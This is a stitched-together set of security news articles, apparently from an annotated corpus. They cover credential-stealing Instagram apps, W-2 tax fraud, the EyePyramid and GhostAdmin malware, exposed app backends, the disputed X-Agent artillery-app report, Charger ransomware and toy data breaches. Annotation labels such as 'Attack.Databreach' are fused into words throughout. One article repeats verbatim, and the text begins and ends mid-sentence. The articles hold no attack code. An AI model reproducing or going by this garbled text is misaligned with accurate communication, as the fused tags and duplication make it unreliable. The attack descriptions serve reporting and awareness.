the user 's login details , send them to a remote server , and show a login error . The error would appear every time the user tried to authenticate , and after a certain number of login attempts , the error would change , and ask the user to visit the official Instagram site instead and authorize the app from there . When the user visited the Instagram homepage , he would see a notification from Instagram letting him know that someone has accessed his account . From this point on , if victims do n't change their passwords , the crook would use the victim 's Instagram account to like images or follow other accounts . Stefanko believes these apps power online services that offer Instagram likes and followers for money . Back in January , the researcher discovered a similar app that stoleAttack.DatabreachInstagram credentials and targeted Turkish users . That app , as well , was hosted on the official Google Play Store . Other ways in which hackers could use the stolen Instagram credentials is to post image ads on people 's profiles and to extort some kind of payment from the owners of accounts with a large follower base . Overall , there have been many cases of apps that stoleAttack.DatabreachInstagram credentials in the past few years . In November 2015 , Apple removed an app named `` Who Viewed Your Profile - InstaAgent '' from the App Store because of the same behavior . Six months later , Google faced a similar incident and was forced to remove two apps named `` Who Viewed Me on Instagram '' and `` InstaCare - Who cares with me ? , '' also caught stealingAttack.DatabreachInstagram credentials
Every year , cybercriminals cash in on tax season by targeting individuals , but this year it 's a little different . It 's businesses that must be extra careful when filing , because businesses are experiencing a rise in tax-related scams , specifically W-2 fraud . Researchers at IBM X-Force , the tech giant 's security research division , discovered more than 1400 % growth in general tax-themed spam between December 2016 and March 2017 . `` On top of all the usual activity -- consumer tax fraud , filing on others ' behalf -- we began to see that businesses are being targeted a lot more , '' says Limor Kessem , executive security advisor for IBM Security . In the past , she says , tax fraud on businesses were the purview of only advanced attackers . This year , they saw a rise in social engineering attacks on smaller organizations like schools , non-profits , and restaurants as fraudsters start to aim for the `` low-hanging fruit '' of the corporate world . Cybercriminals often collectAttack.DatabreachW-2 data by pretending to beAttack.Phishinga company exec and emailing HR or payroll for employee information , which is used to file fraudulent returns and collect refunds . In addition , they may also request a wire transfer to a specific bank account . Attackers who are more technically inclined may bypass the fake emails and breachAttack.Databreachan organization 's servers to stealAttack.Databreachdata directly , says Kessem . In addition to using W-2 data for their own scams , fraudsters will sell it on the dark web , the report states . The most valuable bundles of information are called `` Fullz '' and contain the victim 's address , contact info , Social Security and driver 's license numbers , plus all W-2 and W-9 information . Each record runs for $ 40- $ 50 in Bitcoin on the Dark Web . With all this data for $ 50 per record , harmful activity does n't have to stop at tax fraud , Kessem notes . Cybercriminals can buy and use this data for other scams like identity theft or online loan applications . Tax-related risks increase as the filing deadline approaches . One-third of Americans ( 54 million people ) filed their taxes after April 1 in 2016 , giving fraudsters a larger window of opportunity to strike . Tax-related cybercrime wo n't stop after April 18 , 2017 . `` There are a number of people filing after the deadline , '' says Kessem , noting the popularity of extensions . There are millions who will still be interested in tax-themed emails . '' However , their tax scam strategies will shift after the deadline as cybercriminals move from stealing data to infecting machines with malware . Because victims may expect messages indicating problems with their returns , they are more likely to open potentially malicious attachments , Kessem explains . Researchers believe data sets sold on the Dark Web are a sign that fraudsters are stealingAttack.Databreachtax info from employer databases -- meaning they get it before the taxpayers
The two hired the services of a local programmer to develop their own brand of malware , a backdoor trojan , which authorities have named EyePyramid . The men used simple spear-phishing emails sentAttack.Phishingto the high-ranking officials they wanted to infect . The emails came with a file attachment , which when opened would covertly install their malware . EyePyramid would collectAttack.Databreachinformation from the target 's system , such as passwords , sensitive documents , and more . The malware would upload this data to various online servers or send to an email address ( via SMTP ) . Italian officials said the two suspects , Giulio Occhionero ( age 45 ) and Francesca Maria Occhionero ( age 49 ) , had most likely used this information for financial profits . It is unclear if this means stock market transactions or blackmail attempts . The two were discovered when one of their emails reached a security researcher , who discovered the payload and notified local police . An investigation followed , and Italian police , together with the FBI , arrested the two and seized servers used to spread the malware and store the stolen data . The two deployed their malware in separate campaigns that took place in 2008 , 2010 , 2011 , 2012 , and 2014 . Court documents reveal the men used the malware to collectAttack.Databreacharound 87GB of data , consisting of keystroke information , 18,327 usernames , and 1,793 passwords . Username and password information was arranged in 122 categories , based on the target 's affiliation , such as business , politics , and more . The EyePyramid malware targeted the following file types for exfiltrationAttack.Databreach: A full list of IOCs has been compiled by Trend Micro security researcher Federico Maggi and is available on GitHub . The researcher has also published an analysis of the malware 's inner workings , not available in court documents , on the Trend Micro blog . The list of victims includes names such as former prime minister Matteo Renzi , former prime minister Mario Monti , cardinal Gianfranco Ravasi , head of the European Central Bank Mario Draghi , Vatican officials , members of Italy 's tax police , Bank of Italy officials , and representatives of the Italian Senate , and members of several Italian ministries ( Finance , Economy , Internal Affairs , Foreign Affairs , and others ) . In a TV interview , Italian investigators said Giulio Occhionero was a high-ranking member of a Masonic lodge . The words `` eye '' and `` pyramid , '' used regularly in the malware 's source code , are some of the most known symbols of Freemasonry .
Named GhostAdmin , this threat is part of the `` botnet malware '' category . According to current information , the malware is already distributed and deployed in live attacks , being used to possibly target at least two companies and stealAttack.Databreachhundreds of GBs of information . According to MalwareHunterTeam and other researchers that have looked at the malware 's source code , GhostAdmin seems to be a reworked version of CrimeScene , another botnet malware family that was active around 3-4 years ago . Under the hood , GhostAdmin is written in C # and is already at version 2.0 . The malware works by infecting computers , gaining boot persistence , and establishing a communications channel with its command and control ( C & C ) server , which is an IRC channel . GhostAdmin 's authors access to this IRC channel and issue commands that will be picked up by all connected bots ( infected computers ) . The malware can interact with the victim 's filesystem , browse to specific URLs , download and execute new files , take screenshots , record audio , enable remote desktop connections , exfiltrate dataAttack.Databreach, delete log files , interact with local databases , wipe browsing history and more . A full list of available commands is available via the image below : The malware 's features revolve around the ability to collectAttack.Databreachdata from infected computers and silently send it to a remote server . GhostAdmin operates based on a configuration file . Among the settings stored in this file , there are FTP and email credentials . The FTP credentials are for the server where all the stolen information is uploaded , such as screenshots , audio recordings , keystrokes and more . On the other hand , the email credentials are used to send an email to the GhostAdmin author every time a victim executes his malware , and also send error reports . MalwareHunterTeam says that the GhostAdmin version he analyzed was compiled by a user that used the nickname `` Jarad . '' Like almost all malware authors before him , Jarad managed to infect his own computer . Using the FTP credentials found in the malware 's configuration file , MalwareHunterTeam found screenshots of GhostAdmin creator 's desktop on the FTP server . Furthermore , the researcher also found on the same server files that appeared to be stolenAttack.Databreachfrom GhostAdmin victims . The possible victims include a lottery company and an Internet cafe . Just from the Internet cafe , the crook has apparently collectedAttack.Databreach368GB of data alone . From the lottery company , the GhostAdmin botmaster appears to have stolenAttack.Databreacha database holding information such as names , dates of births , phone numbers , emails , addresses , employer information , and more . At the time of writing , according to MalwareHunterTeam , the botnet 's IRC channel includes only around ten bots , an approximate victims headcount . Compared to other botnet malware families such as Necurs or Andromeda , which have millions of bots , GhostAdmin is just making its first victims . In its current form , GhostAdmin and its botmaster seem to be focused on data theft and exfiltrationAttack.Databreach. At the time of writing , GhostAdmin detection rate on VirusTotal was only 6 out of 55 ( sample here )
Insecure backend databases and mobile apps are making for a dangerous combination , exposingAttack.Databreachan estimated 280 million records that include a treasure-trove of private user data . According to a report by Appthority , more than 1,000 apps it looked at on mobile devices leakedAttack.Databreachpersonally identifiable information that included passwords , location , VPN PINs , emails and phone numbers . Appthority Mobile Threat Team calledVulnerability-related.DiscoverVulnerabilitythe vulnerability HospitalGown and saidVulnerability-related.DiscoverVulnerabilitythe culprit behind the threat are misconfigured backend storage platforms including Elasticsearch , Redis , MongoDB and MySQL . “ HospitalGown is a vulnerability to data exposure caused , not by any code in the app , but by the app developers ’ failure to properly secure the backend servers with which the app communicates , ” wrote the authors of the report releasedVulnerability-related.DiscoverVulnerabilityWednesday . According to Seth Hardy , director of security research , the problem is a byproduct of insecure database instillations that made headlinesVulnerability-related.DiscoverVulnerabilityin February . That ’ s when misconfigured and insecure MongoDB , Hadoop and CouchDB installations became popular extortionAttack.Ransomtargets for hackers who were scanning for vulnerable servers to attack . The weak link in the chain when it comes to HospitalGown are the insecure servers that apps connect to , Hardy said . During the course of Appthority ’ s investigation , it foundVulnerability-related.DiscoverVulnerability21,000 open Elasticsearch servers , revealing more than 43 terabytes of exposed data . In one scenario , the attacker looks for vulnerabilities in the space between the vendor ’ s mobile application and the app ’ s server side components , according to researchers . “ The servers for most mobile applications are cloud based and accessible via the Internet , this allows a bad actor to skip the long and potentially many-layered ‘ compromise ’ stage of an attack , accessingAttack.Databreachcompany data directly from a database that is impossible for the enterprise to see or secure , ” they wrote . Researchers saidVulnerability-related.DiscoverVulnerabilityvulnerable mobile apps it foundVulnerability-related.DiscoverVulnerabilityran the gamut , from office productivity , enterprise access management , games , dating to travel , flight and hotel applications . Any personal identifiable data a user shared with the app was vulnerableVulnerability-related.DiscoverVulnerabilityto possible exfiltrationAttack.Databreachby a hacker . “ These servers were accessible from the Internet , lacked any means of authentication to prevent unwanted accessAttack.Databreachto the data they contained , and failed to secure transport of data , including PII , using HTTPS : conventions , ” according to the report . While this is a strictly a data security issue , Appthority saidVulnerability-related.DiscoverVulnerability, attacks can quickly escalate and personal information could easily be leveraged in a spear phishing attackAttack.Phishingor brute force attack . In its report , AppThority showed how a mobile VPN app called Pulse Workspace , used by enterprises , government agencies and service providers , leakedAttack.Databreachdata . While Pulse Workspace created an API to secure front-end Elasticsearch access , the backend , and all of the app ’ s data records , were exposed and leakedAttack.DatabreachPulse customer data . AppThority notifiedVulnerability-related.DiscoverVulnerabilityPulse Workspace and its customers of the vulnerability , which have since been fixedVulnerability-related.PatchVulnerability. Appthority is careful to point out that of the platforms it examined – Elasticsearch , Redis , MongoDB , and MySQL – each had plugins to allow for proper public exposure on the internet . “ Best practices on secure data stores is just not being adopted in too many cases , ” Hardy said . Elasticsearch , for example , has a bevy of security and data protection capabilities , such as being able to encrypt all the data that ’ s on the platform . Increasing the risk of HospitalGown type-attacks is that fact that many apps Appthority looked at seemed benign in terms of shared user data . But , increasingly apps have advertising components that collectAttack.Databreachpersonal identifiable data that can be mined by hackers for phishingAttack.Phishingor ransomware attacksAttack.Ransom. App developers and system administrators need to know where their data is stored and make sure it is secured , Hardy told Threatpost .
Experts have cast doubt on a recent report claiming that hackers linked to a Russian military intelligence agency used a piece of Android malware to track Ukrainian artillery units . A report published by threat intelligence firm CrowdStrike before Christmas revealed that the Russia-linked cyberespionage group known as Fancy Bear ( aka APT28 , Pawn Storm , Sofacy , Tsar Team , Strontium and Sednit ) modified a legitimate Android app used by the Ukrainian military . Specifically , researchers foundVulnerability-related.DiscoverVulnerabilityan Android version of X-Agent , a piece of malware known to be used by Fancy Bear , embedded in an app developed by artillery officer Yaroslav Sherstuk to help military personnel reduce the time to fire D-30 howitzers . According to CrowdStrike , the malicious app , which had been distributed on Ukrainian military forums from late 2014 through 2016 , was capable of accessingAttack.Databreachcontact information , SMS messages , call logs and Internet data . The security firm believes these capabilities could have allowed Russia to track Ukrainian troops via the app . CrowdStrike also pointed to a report claiming that Ukraine had lost many D-30 guns in the past years , and speculated that this cyber operation may have contributed to those losses . Based on its investigation , the company is confident that Fancy Bear is connected to the Russian military , particularly the GRU foreign military intelligence agency . Sherstuk has called CrowdStrike ’ s report “ delusional ” and pointed out that the app is not open source . He says the application has been under his control and he personally oversees the activation of each installation . Jeffrey Carr , CEO of Taia Global and founder of the Suits and Spooks conference , has analyzed CrowdStrike ’ s report and , after contacting several other experts , he determined that the security firm ’ s arguments are flawed . According to Carr , while X-Agent may be used by Fancy Bear , the malware is not exclusive to the group . The X-Agent source code appears to have been obtained by several entities , including Ukrainian hacktivist Sean Townsend and the security firm ESET . The X-Agent variant found in the Ukraine military app has also been analyzed by Crysys , the Hungary-based security firm that has investigated several sophisticated pieces of malware , including Duqu . Researchers have found similarities between X-Agent implants described in previous Fancy Bear reports and the version found in the Ukrainian military app , but they pointed out that such similarities can be faked by threat actors . Another interesting discoveryVulnerability-related.DiscoverVulnerabilityis that the rogue app does not use GPS to obtain the infected device ’ s exact location , which Carr namesVulnerability-related.DiscoverVulnerability“ a surprising design flaw for custom-made malware whose alleged objective was to collectAttack.Databreachand transmit location data on Ukrainian artillery to the GRU ” . While the malware can collectAttack.Databreachsome location data via the base stations used by the infected Android device , Carr believes it ’ s not enough to track someone , especially given Ukraine ’ s poor cellular service . Pavlo Narozhnyy , a technical adviser to Ukraine ’ s military , told VOA that he doubts the D-30 app can be hacked , and he claimed that none of the app ’ s users reported any D-30 howitzer losses . Carr also highlighted that the malware-infected app may have not actually made it onto a single Ukrainian soldier ’ s Android device , considering that each user needed to contact Sherstuk personally to obtain an activation code .
Experts have cast doubt on a recent report claiming that hackers linked to a Russian military intelligence agency used a piece of Android malware to track Ukrainian artillery units . A report published by threat intelligence firm CrowdStrike before Christmas revealed that the Russia-linked cyberespionage group known as Fancy Bear ( aka APT28 , Pawn Storm , Sofacy , Tsar Team , Strontium and Sednit ) modified a legitimate Android app used by the Ukrainian military . Specifically , researchers foundVulnerability-related.DiscoverVulnerabilityan Android version of X-Agent , a piece of malware known to be used by Fancy Bear , embedded in an app developed by artillery officer Yaroslav Sherstuk to help military personnel reduce the time to fire D-30 howitzers . According to CrowdStrike , the malicious app , which had been distributed on Ukrainian military forums from late 2014 through 2016 , was capable of accessingAttack.Databreachcontact information , SMS messages , call logs and Internet data . The security firm believes these capabilities could have allowed Russia to track Ukrainian troops via the app . CrowdStrike also pointed to a report claiming that Ukraine had lost many D-30 guns in the past years , and speculated that this cyber operation may have contributed to those losses . Based on its investigation , the company is confident that Fancy Bear is connected to the Russian military , particularly the GRU foreign military intelligence agency . Sherstuk has called CrowdStrike ’ s report “ delusional ” and pointed out that the app is not open source . He says the application has been under his control and he personally oversees the activation of each installation . Jeffrey Carr , CEO of Taia Global and founder of the Suits and Spooks conference , has analyzed CrowdStrike ’ s report and , after contacting several other experts , he determined that the security firm ’ s arguments are flawed . According to Carr , while X-Agent may be used by Fancy Bear , the malware is not exclusive to the group . The X-Agent source code appears to have been obtained by several entities , including Ukrainian hacktivist Sean Townsend and the security firm ESET . The X-Agent variant found in the Ukraine military app has also been analyzed by Crysys , the Hungary-based security firm that has investigated several sophisticated pieces of malware , including Duqu . Researchers have found similarities between X-Agent implants described in previous Fancy Bear reports and the version found in the Ukrainian military app , but they pointed out that such similarities can be faked by threat actors . Another interesting discoveryVulnerability-related.DiscoverVulnerabilityis that the rogue app does not use GPS to obtain the infected device ’ s exact location , which Carr namesVulnerability-related.DiscoverVulnerability“ a surprising design flaw for custom-made malware whose alleged objective was to collectAttack.Databreachand transmit location data on Ukrainian artillery to the GRU ” . While the malware can collectAttack.Databreachsome location data via the base stations used by the infected Android device , Carr believes it ’ s not enough to track someone , especially given Ukraine ’ s poor cellular service . Pavlo Narozhnyy , a technical adviser to Ukraine ’ s military , told VOA that he doubts the D-30 app can be hacked , and he claimed that none of the app ’ s users reported any D-30 howitzer losses . Carr also highlighted that the malware-infected app may have not actually made it onto a single Ukrainian soldier ’ s Android device , considering that each user needed to contact Sherstuk personally to obtain an activation code .
Google Play , the official market for Android apps , was caught hosting a ransomware app that infected at least one real-world handset , security researchers said Tuesday . The ransomware was dubbed Charger and was hidden inside an app called EnergyRescue , according to a blog post published by security firm Check Point Software . Once installed , Charger stoleAttack.DatabreachSMS contacts and prompted unsuspecting users to grant it all-powerful administrator rights . If users clicked OK , the malicious app locked the device and displayedAttack.Ransomthe following message : You need to payAttack.Ransomfor us , otherwise we will sell portion of your personal information on black market every 30 minutes . WE GIVE 100 % GUARANTEE THAT ALL FILES WILL RESTORE AFTER WE RECEIVE PAYMENT . WE WILL UNLOCK THE MOBILE DEVICE AND DELETE ALL YOUR DATA FROM OUR SERVER ! TURNING OFF YOUR PHONE IS MEANINGLESS , ALL YOUR DATA IS ALREADY STORED ON OUR SERVERS ! WE STILL CAN SELLING IT FOR SPAM , FAKE , BANK CRIME etc… We collect and downloadAttack.Databreachall of your personal data . All information about your social networks , Bank accounts , Credit Cards . We collectAttack.Databreachall data about your friends and family . The app sought 0.2 Bitcoin , currently worth about $ 180 . In an e-mail , Check Point researchers said the app was available in Google Play for four days and had only a `` handful '' of downloads . `` We believe the attackers only wanted to test the waters and not spread it yet , '' the researchers told Ars . The infection was detected by Check Point 's mobile malware software , which the company sells to businesses . Google officials have since removed the app and have thanked Check Point for raising awareness of the issue
Imagine turning on your smartphone to send a text and finding this threatening notice instead : “ You need to payAttack.Ransomfor us , otherwise we will sell portion of your personal information on black market every 30 minutes . WE GIVE 100 % GUARANTEE THAT ALL FILES WILL RESTORE AFTER WE RECEIVE PAYMENT . WE WILL UNLOCK THE MOBILE DEVICE AND DELETE ALL YOUR DATA FROM OUR SERVER ! TURNING OFF YOUR PHONE IS MEANINGLESS , ALL YOUR DATA IS ALREADY STORED ON OUR SERVERS ! WE STILL CAN SELLING IT FOR SPAM , FAKE , BANK CRIME etc . We collect and downloadAttack.Databreachall of your personal data . All information about your social networks , Bank accounts , Credit Cards . We collectAttack.Databreachall data about your friends and family . '' This is the message , word for word , found recently by Oren Koriat and Andrey Polkovnichenko , a pair of mobile cybersecurity analysts at Check Point , a security firm in California . The smartphone on which it appeared was an Android model that had been compromised by smartphone ransomware . Ransomware has become a ubiquitous threat to personal-computer users . Criminals remotely access a victim 's computer and lock all the files using encryption software , offering to unlock the data in exchange for a paymentAttack.Ransom. The first ransomware attackAttack.Ransomon a phone occurred in 2013 , according to the Check Point researchers , but until now has been confined to small numbers of victims , primarily in Eastern Europe . Now , the company says , the threat has gained a toehold in the United States . Koriat and Polkovnichenko found the software , which they dubbed Charger , embedded in an app called Energy Rescue , which purports to make a phone battery last longer . `` The infected app stealsAttack.Databreachcontacts and SMS messages from the user ’ s device and asks for admin permissions , '' the company said in a statement . `` If granted , the ransomware locks the device and displaysAttack.Ransoma message demanding paymentAttack.Ransom. '' The payment demandedAttack.Ransomwas 0.2 bitcoin , or about $ 180 at the current exchange rate . ( The phone was being used for business and did n't contain much personal data ; the owner chose to replace the phone rather than pay . ) The most disturbing part of the attack might be that the app was downloaded from the Google Play store . Android phones can use apps from other sources , but security experts usually recommend that users stick to the Play store to take advantage of the processes Google uses to check the software for safety . `` The main issue here is the fact that such a severe threat managed to penetrate Google 's security and enter Google Play , Google 's official app store , '' says Daniel Padon , another member of Check Point 's research team . `` Most malware that manages to enter Google Play has only slim malicious traits , while Charger is about as malicious as can be . As mobile ransomware try to keep the pace with their cousins in the PC world , we are likely to see more efforts of this sort , endangering users around the world . '' Padon added that this malware was particularly sophisticated , using a number of innovative tactics to evade detection by Google . Google commended the security firm for catching the Charger threat so early . `` We appreciate Check Point ’ s efforts to raise awareness about this issue , '' a Google spokesperson says . `` We ’ ve taken the appropriate actions in Play and will continue to work closely with the research community to help keep Android users safe . '' Ransomware attacks on mobile phones are still relatively rare . One well-known case involved users of pornography apps in Eastern Europe who were targeted by ransomware called DataLust , Check Point says . In those cases , the ransomAttack.Ransomwas set at 1,000 rubles , or about $ 15 . There 's evidence that Charger , too , comes from Eastern Europe—beyond the clichéd bad grammar of the ransom note . `` This is likely done to keep the developers from being prosecuted in their own countries or being extradited between countries . '' Ransomware attacksAttack.Ransomare joining a growing list of threats to mobile phone securit
“ It ’ s pretty high confidence that Fancy Bear had to be in touch with the Russian military , ” Dmitri Alperovich told Forbes . Crowdstrike ’ s core argument has three premises : If all of these premises were true , then Crowdstrike ’ s prior claim that Fancy Bear must be affiliated with the GRU [ 4 ] would be substantially supported by this new finding . Dmitri referred to it in the PBS interview as “ DNA evidence ” . In fact , none of those premises are supported by the facts . This article is a summary of the evidence that I ’ ve gathered during hours of interviews and background research with Ukrainian hackers , soldiers , and an independent analysis of the malware by CrySys Lab . My complete findings will be presented in Washington D.C. next week on January 12th at Suits and Spooks . Crowdstrike , along with FireEye and other cybersecurity companies , have long propagated the claim that Fancy Bear and all of its affiliated monikers ( APT28 , Sednit , Sofacy , Strontium , Tsar Team , Pawn Storm , etc . ) were the exclusive developers and users of X-Agent . If both a security company and a hacker collective have the X-Agent source code , then so do others , and attribution to APT28/Fancy Bear/GRU based solely upon the presumption of “ exclusive use ” must be thrown out . This doesn ’ t mean that the Russian government may not choose to use it . In fact , Sean Townsend believes that the Russian security services DO use it but he also knows that they aren ’ t the only ones . The first iteration of the POPR-D30 Android app designed by Ukrainian military officer Jaroslav Sherstuk ( and the only iteration allegedly impacted by this malware ) was a simple ballistics program that calculated corrections for humidity , atmospheric pressure , and other environmental factors that determine accuracy of the D-30 Howitzer . The Android APK malware doesn ’ t use GPS nor does it ask for GPS location information from the infected phone or tablet . That ’ s a surprising design flaw for custom-made malware whose alleged objective was to collectAttack.Databreachand transmit location data on Ukrainian artillery to the GRU . It does collectAttack.Databreachbase station information but that isn ’ t nearly sufficient for targeting purposes . In rural areas , one base station could have a range of up to 30 kilometers ( 18.6 miles ) . Crowdstrike ’ s estimate of 80 % losses of the D-30 Howitzers came from one source — an article written by pro-Russian blogger Boris Rozhin , a resident of Crimea who writes for a blog called The Saker which he calls “ the voice of totalitarian propaganda ” Bloomberg journalist Leonid Bershidsky pointed out that the estimates “ appear to be based on an assumption that changes in military balance reports , themselves far from perfect , can be interpreted as losses . Ukraine , a nation at war , doesn ’ t broadcast information about its specific capabilities ” . Pavlo Narozhnyy , a Ukraine military advisor , told VOA that “ I personally know hundreds of gunmen in the war zone . None of them told me of D-30 losses caused by hacking or any other reason ” . Even Rozhin acknowledged that his interpretation of the International Institute of Strategic Studies ( IISS ) data needs work : “ Generally speaking , both methods have their advantages and disadvantages , as it is obvious that lost armour did not count everything destroyed , as well as that the loss of hardware ( counted based on staffing standards ) in some cases did not mean that it was destroyed . For example , some hardware lost after 2013 was left in Crimea and returned to Ukraine only partially . Some hardware could have existed only on paper and even before the war could have been non-repairable . This suggests that the real losses of the UA still need to be further researched to make the conclusions more precise ” . While the original POPR-D30 app was available for download online , users had to contact Sherstuk personally and provide their military credentials in order to receive a code for activation . There is no evidence that any of those users had their apps compromised by malware . In fact , Crowdstrike hasn ’ t provided any evidence that the malware-infected Android app was used by even a single Ukrainian soldier . Sherstuk himself stopped supporting the first version in 2015 [ 10 ] so how could Crowdstrike even begin to justify its claims as to the malware ’ s effectiveness ? Part of the evidence supporting Russian government involvement in the DNC and related hacks ( including the German Bundestag and France ’ s TV5 Monde ) stemmed from the assumption that X-Agent malware was exclusively developed and used by Fancy Bear . We now know that ’ s false , and that the source code has been obtainedAttack.Databreachby others outside of Russia . The GRU , according to Crowdstrike , developed a variant of X-Agent to infect an Android mobile app in order to geolocate and destroy Ukraine ’ s D-30 howitzers . To do this , they chose an artillery app which had no way to send or receive data , and wrote malware for it that didn ’ t ask for GPS position information ? Crowdstrike never contacted the app ’ s developer to inform him about their findings . Had they performed that simple courtesy , they might have learned from Jaroslav Sherstuk how improbable , if not impossible , their theory was . Instead , they worked inside of their own research bubble , performed no verification of infected applications or tablets used by Ukraine ’ s artillery corps , and extrapolated an effect of 80 % losses based upon a self-proclaimed , pro-Russian propagandist and an imaginary number of infected applications .
Further ReadingStepson of Stuxnet stalked Kaspersky for months , tapped Iran nuke talksTwo years ago , researchers at Moscow-based Kaspersky Lab discovered their corporate network was infected with malware that was unlike anything they had ever seen . Virtually all of the malware resided solely in the memory of the compromised computers , a feat that had allowed the infection to remain undetected for six months or more . Kaspersky eventually unearthed evidence that Duqu 2.0 , as the never-before-seen malware was dubbed , was derived from Stuxnet , the highly sophisticated computer worm reportedly created by the US and Israel to sabotage Iran ’ s nuclear program . The Kaspersky Lab researchers still do n't know if a single group of individuals is behind the attacks , or if they 're being carried out by competing hacker gangs . The use of the fileless malware and command-server domains that are n't associated with any whois data makes the already difficult task of attribution almost impossible . The researchers first discovered the malware late last year , when a bank 's security team found a copy of Meterpreter—an in-memory component of Metasploit—residing inside the physical memory of a Microsoft domain controller . After conducting a forensic analysis , the researchers foundVulnerability-related.DiscoverVulnerabilitythat the Meterpreter code was downloaded and injected into memory using PowerShell commands . The infected machine also used Microsoft 's NETSH networking tool to transport data to attacker-controlled servers . To obtain the administrative privileges necessary to do these things , the attackers also relied on Mimikatz . To reduce the evidence left in logs or hard drives , the attackers stashed the PowerShell commands into the Windows registry . Fortunately , the evidence on the domain controller was intact , presumably because it had n't been restarted before Kaspersky Lab researchers began their investigation . An analysis of the dumped memory contents and the Windows registries allowed the researchers to restore the Meterpreter and Mimikatz code . The attackers , the researchers later determined , had used the tools to collectAttack.Databreachpasswords of system administrators and for the remote administration of infected host machines .
The most recent breachAttack.Databreachof smart teddy bears -- which can receive and send voice messages from children and parents -- have been involved in a data breachAttack.Databreachdealing with more than 800,000 user accounts . The company behind the products , Spiral Toys , is denying that any customers were hacked . Zach Lanier , director of research at Cylance , went through the more famous incidents involving toys and breaches and offers a tip with each case . This may have given attackers accessAttack.Databreachto voice recordings from the toy 's customers , by allegedly making the mistake of storing the customer information in a publicly exposedAttack.Databreachonline MongoDB database that required no authentication process . Thus anyone , including the attackers , was able to view and stealAttack.Databreachthe data . CloudPets placed no requirement on password strength , making it much easier to decipher passwords . Tip : Always create a secure password , no matter the strength requirement . Include lowercase and uppercase letter , symbols and numbers . Use a password manager to help create and store unique passwords for sites and services . A line of stuffed animals , these connected toys combine with a mobile application that was vulnerableVulnerability-related.DiscoverVulnerabilitydue to a number of weak APIs , which didn ’ t verify who sent messages . This meant that an attacker could guess usernames , or email addresses , and ask Fisher-Price for server return details about associated accounts and children ’ s profiles , which provides their name , birthdate , gender , language and toys they have played with . Tip : If the IoT device connects to a mobile app or desktop computer , it is important to examine how it connects . If the start of the URL address is http rather than https , which is the secure version of HTTP , then your device is making a less secure connection . The doll has a microphone and accesses the internet to answer your child 's questions . Moreover , criminals could have the ability collectAttack.Databreachyour personal information . Tip : If the toy does require Wi-Fi , make sure it supports modern , more secure Wi-Fi capabilities like WAP2 . Their speech-recognition software maker Nuance Communications violated federal rules by listening to children and saving the recordings . It ’ s valuable to know how they are using your data . Don ’ t provide personal information that seems extra or unnecessary . VTech had its app store database , Learning Lodge , hacked . As a result of the breachAttack.Databreach, over 11.6 million accounts were compromisedAttack.Databreachin a cyberattackAttack.Databreach, exposingAttack.Databreachphotos of children and parents as well as chat logs . The profile data leaked included their names , genders and birth dates . Tip : Check to see if the manufacturer has had any cybersecurity issues in the past , and if so , how they responded . Alternatively , if the company is relatively new , your device is definitely at greater risk . The interactive toy has the ability to communicate and record conversations . Those conversations are sent to the company ’ s servers , analyzed and then stored in the cloud . The toy was criticized for spying on kids by recording their conversations . Through Wi-Fi , attackers can hijack the connection to spy on your children , stealAttack.Databreachpersonal information , and turn the microphone of the doll into a surveillance device . Tip : Since the device is Wi-Fi enabled , confirm if the device supports modern security protocols . If the device only uses WEP or WPA ( but not WPA2 ) security standards , it may be too risky to use . Those versions are older and over time have become almost entirely insecure from attack